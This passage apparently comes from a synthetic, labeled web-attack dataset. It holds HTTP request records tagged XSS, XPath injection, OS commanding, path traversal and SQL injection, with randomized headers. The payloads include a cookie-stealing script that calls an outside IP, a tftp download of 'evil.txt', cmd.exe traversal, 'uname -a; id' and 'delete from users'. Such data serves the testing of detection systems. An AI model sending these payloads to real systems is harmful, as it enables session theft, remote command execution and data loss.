Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: identity
Upgrade: ottcoz/3.6
Warning: 681 105.145.39.255 "iAonrneh" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47704
Start - Id: 47562
class: XSS
GET /snAsd5uEibsvtgpz4/07honoDrr.5/dzTaOGSvbscripte5Mopen/HdeleteIhEservicesuTICx/eksexwnhe/aZlOH/t7l/sdewaaeaNhesi/adteml.mdb?toutsbw=s%7Cdppshtpassiovbscript%240ncmdLN%7E%3Fos2&uacro2e5dhrm=yl09ott4eicm7ieF&uEe=iaeAu&hmeettE=%3Cxml+++id++++%3D+%22+X++%22++++%3E%3Ca+++%3E%3Cb++++%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F184.46.152.116%2Fstas.aspx%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++++%3E%3C%2Fa%3E%3C%2Fxml%3E&nnXelth=573&esere9=Al3&hyml283n4tW=rfsstyleinput6tfankemer HTTP/1.1
Host: 33.129.211.227
Connection: keep-alive
Accept: text/*;q=0.4, text/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: Odm-c7;q=0.9, aebme-n
Cache-Control: min-fresh=081
Client-ip: 19.138.115.203
Cookie: ipaln=zeF75;etiiqSe4osjv=oi4;olspha2tHes=0dine
Cookie2: $Version="143"
Date: Mon, 27 Sep 04 19:31:10 UTC
ETag: "JI9Pavis6Uc7TXF"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Mon, 09 Nov 09 06:52:54 GMT
If-Unmodified-Since: Sat, 24 Mar 07 15:43:03 CET
If-Match: *
If-None-Match: "sWLbfcJfZh0qXJ.U"
If-Range: Fri, 26 Aug 05 04:56:05 UTC
Max-Forwards: 7609
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: Digest nonce
Range: 946-214738,54330-8
Referer: http://uoOda.com/iats.dll
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: g3cGhtGnrJ
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: 7.5 www.gooane2.gif
Transfer-Encoding: deflate
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 57604389
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47562
Start - Id: 48935
class: XPathInjection
GET /pe6scos6us0IwnioN/nidfsarrypoea2/nnaumr/vtYnpocbtiEieol0r/ek/i2td8s59enncrre3/inputxFjyjD/iG8xjGtb8XrV/r-5Fpy2.msf?kTvGP=7511035&sout=83515&iw3ne=kHMW%40MWaPG&etsomnE=o&3hwcdoeti=870917524&kh0laone6UOea=h%5D8&A7vOlinkLy=ozaAsitM&eotkwla=114616028&ltodi5msCeaVuvl=objectot&VDro9F1H=5&eel2nsxaY=52892&nWre7mehrnza=eTqy_LD%40&RxperlMLaAostdinsS=935030&8h=paf+&nhdsiNatr6la=%28i+%3C++count%28see5c%2Fchild%3A%3Atext%28%29%29+and+j+%3C+count%28rlh8r%2Fchild%3A%3Acomment%28%29%29+++and++k+%3C+++++count%28nmimpe%2Fchild%3A%3A*%29+++++%29 HTTP/1.1
Host: www.edrashpdeu.uk:0
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: p-w
Cache-Control: no-cache
Client-ip: 163.68.137.81
Cookie: umallahd=ycY;oltdp11li8c=ai6;eocIeut1osp6alr=76553
Cookie2: $Version="303"
Date: Thu, 13 Sep 07 05:19:40 UTC
ETag: "pu9Z2wUyy65gZhc"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 30 Oct 04 04:32:58 GMT
If-Unmodified-Since: Fri, 17 Nov 06 16:47:38 CET
If-Match: "O7Sn0543aQHWUI_e9Dv"
If-None-Match: *
If-Range: "2LqXz-6PTMdWUtFd2M"
Max-Forwards: 340
MIME-Version: 6.7
Pragma: ik=ttn
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Digest realm
Range: 326-470558,-0121
Referer: http://dobl.net/Oisn/sjtRyn7/ipou/BtEeT/wie4.mspx
TE: trailers,trailers
Trailer: Trailer
User-Agent: yeonsla0 (aAMm@05U; rXPk0u9)
UA-CPU: 68000
UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/0.4 www.aycmt5e.js
Transfer-Encoding: compress
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48935
Start - Id: 44425
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ftqxbabga.de:5
Connection: zylien
Accept: image/*;q=0.3, text/xml
Accept-Charset: iso-10646-ucs-2;q=0.6
Accept-Encoding: *
Accept-Language: Idpid-tionl, ltegh-Tdejn4e, hdn7nl-ntuchw, bl-ntC0ecN, hohnm-QE
Cache-Control: max-stale
Client-ip: 27.105.36.250
Cookie: eoadr=4847
Cookie2: $Version="352"
Date: Sat, 06 Feb 10 12:24:18 UTC
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sun, 02 Aug 09 20:15:30 CET
If-Unmodified-Since: Mon, 29 Dec 08 06:09:27 GMT
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 6.2
Pragma: o=brtsHn
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Digest nonce
Range: 6-02287,72753-
Referer: http://www.ttOfhdn.biz/mdaya/1e6l/ifmaw/oeTt1ro.mdb
TE: deflate,gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/7.9 (X11; U; Linux i586 7.0; i4-Nl; rv:9.0.6) Gecko/58806210
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: 8.6 248.170.100.124:6
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 850961396
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44425
Start - Id: 44152
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ifrf.net
Connection: close
Accept: video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: max-stale=120
Client-ip: 160.44.210.172
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="0"
Date: Sat, 07 Aug 04 02:21:13 CET
ETag: W/"KuJgjGf4aIE960gFup"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 03 Jan 07 13:46:53 CET
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 9225
MIME-Version: 7.5
Pragma: l2='nndRc'
Proxy-Authorization: Digest realm
Authorization: NTLM SDB6ZTNwYVNvdG1lM2F0YW5ob2RzZWNUdWgyZTNrbW9wZGhzYzdyb0k=
Range: 815-,644-20793
Referer: /yrnuas/jsne.png
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 1.5; ma-ae; rv:4.7.3) Gecko/19119905
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: nldsg/8.2 184.179.46.67, 5.6 157.114.92.188, 6.1 244.151.168.19
Transfer-Encoding: gzip
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44152
Start - Id: 46395
class: PathTransversal
GET /ofczqpik.YvL/SQtx7LC20PexeccaMo.htm?ilmetbEUsegoito=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FnnaV.conf HTTP/1.1
Host: www.tr8snreonl.st
Connection: aDrg
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: iseuct-ew7sd
Cache-Control: seeNEooO='he'
Client-ip: 156.163.255.16
Cookie: sliseeja7giaewa=Ted;95NVnL0NfV6=a;i4fgs9Som1pmya=edAn;nAhreskni=m5R7v;GcxD=c ;pIitSaU=nzrp
Cookie2: $Version="7"
Date: Wed, 05 May 10 07:44:31 UTC
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Mon, 22 Oct 07 12:50:18 CET
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Sat, 26 Dec 09 13:58:52 CET
Max-Forwards: 667
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Basic UjNheDppb213dGU=
Range: 0-,-1441,-234089
Referer: /9dhyhng/lckrc1ma.bin
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Charset
User-Agent: iyEiTheomoT
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 7.0 137.126.180.196, FTP/0.8 32.21.102.60, HTTP/6.5 86.109.106.145
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 188.93.207.249
X-Serial-Number: 75398657
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46395
Start - Id: 44589
class: OsCommanding
GET /47cntytcwzanow/gR@8.8VW0AeuClF.o0e.gif?ai1ishahdgS7d=9111800&Emiha5s5ot9a1ei=41134&qeFo1lItrree=13423&txmedn4=65.215.109.21+++%7C++tftp+192.168.10.33+evil.txt&M6whtayEOur=%3Eaamv HTTP/1.0
Host: 194.91.252.148:1358
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.3
Accept-Language: oeIte9to-2t0
Cache-Control: EoNrS=6eroon
Client-ip: 61.207.233.103
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="6"
Date: Wed, 03 May 06 23:39:03 UTC
ETag: "w78aexpupN8g9SbMEjW"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Fri, 12 Jun 09 21:09:27 CET
If-Unmodified-Since: Thu, 09 Jun 05 05:10:08 UTC
If-Match: *
If-None-Match: "F21_4ypxpXPebo-2"
If-Range: "7XI-iDNXu5Ygiy-XYr7"
Max-Forwards: 6
MIME-Version: 0.9
Pragma: 0b8oc='ensodx'
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: Basic YXR1ZzZoOmlyN20=
Range: -2578
Referer: /rnhTr/hLaripan/lpikgtCa/xdneh/egs19eda.php4
TE: chunked,trailers
Trailer: Accept
User-Agent: Mozilla/1.6 (compatible; an7lMDo; Open BSD i386; mes8aecbg)
UA-Color: color8
Via: 7.9 www.iakk.gif, FTP/8.9 27.142.127.246
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: stnat6/0.0
Warning: 109 www.oqshO.css "sekiw5f" 
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44589
Start - Id: 43668
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 120.40.240.77
Connection: ohntsA
Accept: audio/*, image/*;q=0.6, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sa-hfEst, g-T;q=0.2, e-rntndZ4i, pvTauca-nijx
Cache-Control: no-store
Client-ip: 158.250.190.86
Cookie: tSzf=tqbtelnetrmh-~symain
Date: Tue, 14 Mar 06 12:11:10 GMT
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: r63aj@miwmhwde.ch
If-Modified-Since: Tue, 06 Dec 05 09:36:51 UTC
If-Unmodified-Since: Sun, 09 Dec 07 13:12:33 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 16
MIME-Version: 2.2
Pragma: mot9d='etne8irh'
Referer: http://www.yki3de.uk/repe.gz
TE: chunked;q=0.2,deflate
User-Agent: 59rtrtin/2.7.4
UA-CPU: Sparc
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 129.156.147.149
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43668
Start - Id: 49475
class: XPathInjection
GET /lD/yl-mg/pZRvbscript3hSR95glinkoU/vnE8MqinBEIBy./nzbxNgZ4Enrd/ihixnl7Sr/b2ue9e1eiaTeRe/teVbV/dEGZ9Wrxn9EPM.WD4PLk.jpeg?og8ateh=hjifvesH5gs&ftpUjv7Ixxp_=o0%27%5D++%7C++P++++%7C+%2F%2Fuser%5B++++name%2Ftext%28+++%29+++%3D+%27mmhte&etneahM=l4outruc%27f%7Ewls0%3C&RAsdeletel=NfOhsiArsentwanegn&srnnsvje=d.rer.&nrcOehHp=tZ0akryxX&mmsyaAhh7S=9059 HTTP/1.1
Host: 70.61.128.104:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: atrztA-tsu;q=0.4, lgot0-cpehqeec
Cache-Control: max-age=27
Client-ip: 79.176.207.17
Cookie: hniaA=30471786;klanUttstf=fceil;ha6=159829;0a4=rShRhedeswohi0t7;ns=teo;UdRttz=ntin oflhAk
Cookie2: $Version="351"
Date: Tue, 29 Sep 09 21:20:57 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: haatt@hdst54eL.net
If-Modified-Since: Tue, 01 Jan 08 02:32:22 CET
If-Unmodified-Since: Thu, 11 May 06 16:51:59 CET
If-Match: *
If-None-Match: "acQoq1fTvp5ayMEI5"
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 5
MIME-Version: 2.1
Pragma: jesi=cml3no
Proxy-Authorization: so9ts otea6n=hdva
Authorization: ed4p ewtc5lar=tiKyS
Range: -012
Referer: /nraiox/ow6anor/safe0.php4
TE: trailers
Trailer: Cache-Control
User-Agent: R9dj2ptvft (tBY2hIKlO; aGhf3jd; dRMmfa; 9Bq9@yD; t2F0p3fP4)
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 201583507
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49475
Start - Id: 45003
class: PathTransversal
GET /e4TV4/hPjdjU-C5lE@EAz.aspx?oncrRar=I&h3saebg=jD8croB74S&pmvhshiulieetps=755590&f1cghrkt=.%2F..%2F.%2F..%2F&wctPwsi6aieaeee=000711974&moyzhhztlotkt=r&nrCnle=jjgrp8&nmeegrioictse=smoTh%27%7E&aLmcelBSlAmeon=leAoB&xd1I=tlvl&mformx2MoqdQ=06&utqstia=%29%25e&eiopyrmaq=fYAy2n.2_.xL&5betweenQ0Timgl96scriptZ=adinycta HTTP/1.0
Host: www.enumovet.biz
Connection: iwehto9l
Accept: */*
Accept-Charset: iso-8859-8-i
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie: 5botiedmb1nwiHd=4374
Cookie2: $Version="13"
Date: Wed, 07 Oct 09 19:42:17 GMT
ETag: "06Aqq7j6Gd0C_dK"
Expect: oieh
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Mon, 13 Nov 06 13:33:16 CET
If-Match: "LHIPS74OafuYcVg.J"
If-None-Match: *
If-Range: "FzYKzj_X7HEONkjN0K3p"
Max-Forwards: 80
MIME-Version: 1.4
Pragma: osxui='s'
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Range: 2613-116,8-,0-
Referer: /staaLuV/9otbeo/if4esk/rMFhe0/kRtenr.php4
TE: chunked;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/4.0 (X11; U; Solaris 9.0; rs-fb; rv:3.2.7) Gecko/37936520
UA-CPU: StrongARM
UA-Disp: 6840,695,32
UA-OS: FreeBSD
UA-Pixels: 569x3212
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: identity
Upgrade: Eubq/3.7
Warning: 081 www.M0ctanr.tiff "grtbt5tn" "Sun, 15 Apr 07 23:46:08 GMT"
X-Forwarded-For: 2.2.77.25
~~~~~: ~~~~~~~~~~

null

End - Id: 45003
Start - Id: 35427
class: SqlInjection
GET /qanfVI-/oGUbaV-1QF@kr73ouxey/e3LO6tH_-uv@tNfe/pnd94mi/8aCPo1zKwBtOn/oc0/l5A8-xdD1UC/ettaAXS.gif?izoienx=rct6beqtaiie+&uehaesei=eunt%3Ebtrvol&hdsciu6=rjoiEvercpo&wK9LgiaCPHZ=94210791&Ra=mniensEsaetyxtmehR&R7mailQE3and8D=ed0Kzwf4&lxTtTwHVT=bTVeenT4&refvUi7m=fGa6WuH4T&dscgisn=bgsoundk&Sq=%27++%29%3B+delete+++++from++users%3B+++++commit%3B++dummy%28+++%27 HTTP/1.0
Host: www.a4ead.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, compress, identity;q=0.5, gzip
Accept-Language: *;q=0.4
Cache-Control: min-fresh=141
Client-ip: 185.9.17.112
Cookie: u8snziOdel=gr7bicbuwi6GTfagpd;GpsjJnin=hIrfG;5fxlog72Du=oiyrn;indoaironryt=767;sCrntsfxtsfepb=hwhere>eo;ss=NieiueadDdoxtya9
Date: Tue, 24 Jul 07 18:24:19 CET
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Tue, 03 Jun 08 13:02:12 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: "D2IWcd4pDLsjIT9g8"
If-None-Match: "6414UPycTaOr9QTdR"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 4331
MIME-Version: 3.1
Pragma: 2dhna='ow'
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 1117-95,491-
Referer: http://8uAOae.fr/tn4S/auaNi/ho7r4/a7oo3.jsp
Trailer: TE
User-Agent: Mozilla/9.8 (Windows; U; WinNT 2.3; vs-64; rv:9.1.6) Gecko/55246913
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4231x7309
Via: HTTP/6.7 www.7ebIuytw.html:7, 7.8 214.92.155.217
Transfer-Encoding: identity
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35427
Start - Id: 36762
class: OsCommanding
GET /anmneNE4uuSdo/u6If_UEl8f/eL2yE/eslDE/sniZrK7FklPC9G/swt9de/gHMjinozU/tohq.mdb?aiaerotiEfAias=%3B+++echo+++++%3Bw+++%3B++uname+++++-a++%3B+++++id HTTP/1.0
Host: www.esn0leOur.de
Connection: Uzrhat
Accept: text/xml;q=0.9
Accept-Charset: iso-8859-7, big5;q=0.7, macintosh;q=0.1, gb2312, windows-1257;q=0.4
Accept-Encoding: 
Accept-Language: hunwTnn-itkiht, uoo-fl;q=0.9
Cache-Control: min-fresh=9050
Client-ip: 130.81.190.203
Cookie: .Fgk=9;p8de1Fettrako=181;Obgsr=9498955
Cookie2: $Version="576"
Date: Thu, 22 Oct 09 18:21:02 UTC
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Mon, 25 Dec 06 23:34:18 UTC
If-Unmodified-Since: Wed, 20 Aug 08 13:49:26 CET
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: *
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Basic cmd0b2xub2U6ak5ocjhsZQ==
Range: 8-,6-50
Referer: /xnSsdih/mfeo6te.jpeg
TE: trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: Mozilla/3.6 (X11; U; Unix 7.5; rr-rh; rv:5.3.2) Gecko/09676063
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.3 171.95.238.220
Transfer-Encoding: deflate
Upgrade: ozdet9/9.7, Rir/6.3, t2nuis/3.2, OrehaH/2.4
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36762
Start - Id: 48526
class: XPathInjection
PUT /iie/napAmaoSU1/ont2/qaHexec-gEh_d.jpg? HTTP/1.0
Content-Length: 336
Content-Language: Ntent
Content-Encoding: compress
Content-Location: http://www.fnp2ha.be/icrhedl/slve75.swf
Content-MD5: b2NocXRlYmg1dWhlMXN5aA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 May 05 17:36:13 CET
Last-Modified: Sat, 11 Feb 06 16:13:28 GMT
Host: www.earaw.uk
Connection: keep-alive
Accept: image/gif;q=0.2, text/xml;q=0.1
Accept-Charset: us-ascii, ks_c_5601-1987, windows-1255;q=0.7
Accept-Encoding: identity;q=0.1, identity;q=0.5, identity
Accept-Language: nnvBtx-mteh8f, lmfh7ew-eo
Cache-Control: max-age=540
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Sat, 20 May 06 03:51:40 CET
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Tue, 24 Jul 07 18:18:48 UTC
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: "maUElsYH51PTTjJhGFUz"
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 2
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: mtoht Tturpk=eefhirah
Range: -97671,976035-235370,9-723
Referer: /6tari.cgi
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: o0eged/7.5.6.3
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7707x473
Via: FTP/6.9 www.rl22ie.jpeg
Transfer-Encoding: gzip
Warning: 437 242.254.172.181 "wwyyel6" "Tue, 23 Aug 05 14:58:53 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ntrisioggieeE88=2 or    count(path/child::node()[position()=((i+j+k+l+1)]  |  path/child::*()[position()=(k+1)])=1     or   14274=&thsSnnddbon=iftqtaahRtFeVhb&.SOreplaceO=38071803&iterasieeA2y=mopenj&Ql0=eSe&mgel2eI7r4Xsyu=dhHr&auiie=pDxIzAfZ&pwebPattfdatU8=10740336

End - Id: 48526
Start - Id: 43406
class: OsCommanding
GET /dI5KZe8IG41Gww/ser.tiff?yadoaemeesyhnh=%5Cnls++++%2Froot%2F&inmeyji=148590&lbroEs2=%5Blike%27r HTTP/1.1
Host: www.7osthuee.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iltt-oaje, infRzhw-hmooltvH;q=0.2, aoMoheg-aedetrP, siI22e-xoiies;q=0.3, EeaA-gder
Cache-Control: only-if-cached
Client-ip: 232.231.66.96
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Sat, 22 Mar 08 15:01:22 CET
ETag: W/"FBRRehdBHitCX2E"
Expect: hWd4dMn
From: 3vrss@buns5n.org
If-Modified-Since: Mon, 06 Dec 04 17:27:52 CET
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: *
If-None-Match: "Zx4BT_YUvjsydfT"
If-Range: *
Max-Forwards: 4960
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic c2g4ZzROaXA6bnBnZWQwcHU=
Range: 6-,47-768842,6146-09
Referer: /cscoeVbt/eo3ih/ovdualr.wav
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: bp@a7vMoc http://www.nhhe.org
UA-CPU: 68000
UA-Disp: 9885,5189,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: deflate
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43406
Start - Id: 48478
class: XPathInjection
GET /hM/_uF/vI5cteappm2essk/rnUbthD.eZtl8.html?ineatteeoeinia=%5Dst+&rNDtireav=edf&hniwi83Owlimzof=63499306&iejs=dlhvldch&olm=r20C_2V&mbaeftujal=En4nehERe-s9qdtta&o19ailf=pBa&xTehtacceso6N4q=nDthr0in&jctosyiunu=oW&1Hwot=window.openyese&gl=hyq&AdhntE=42612694&onoa=0j%279%3F8includemaile&Ov@divbZJInX=7040&hen=odhidg%7CRt%25roeao HTTP/1.1
Host: www.5ha6Et.ch
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.8, x-mac-chinesetrad;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 8.102.172.5
Cookie: eny=solniduadmin%H;?;naAO=oNs'  or (i  <     count(ao6Nt5/child::text()) and     j <  count(3hwyq/child::comment())    and   k  <    count(osutz/child::*) ) or  'Dazw6nye'  =   ' ajf9av7'     or;b7nfhobTsi2i=2804350;sds88cm=z;03Tcrg=e lNremtA
Cookie2: $Version="1"
Date: Wed, 12 Sep 07 20:09:00 UTC
ETag: "yFyREv1hNWxgB.era2"
Expect: 100-continue
From: xwmo0O@eRPai1tmd.cz
If-Modified-Since: Tue, 27 Jun 06 17:06:55 GMT
If-Unmodified-Since: Thu, 21 Oct 04 08:07:04 CET
If-Match: "tdR@Ip_1nujKYvSaTgTh"
If-None-Match: *
If-Range: Tue, 03 Oct 06 08:33:50 UTC
Max-Forwards: 464
MIME-Version: 3.9
Pragma: R=uf
Proxy-Authorization: Basic YXdhZGxoOmRNZXM=
Authorization: Basic aG9idUFiOmxvYTZ5
Range: -8848
Referer: /hosn.txt
TE: gzip;q=0.2,chunked;q=0.5
Trailer: Warning
User-Agent: Htabiye7aBTsro
UA-Disp: 115,5491,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 126x7026
Via: 2.9 217.207.187.93:848
Transfer-Encoding: identity
Upgrade: rnT/4.1, eii4T/3.5, i8M0at/5.5
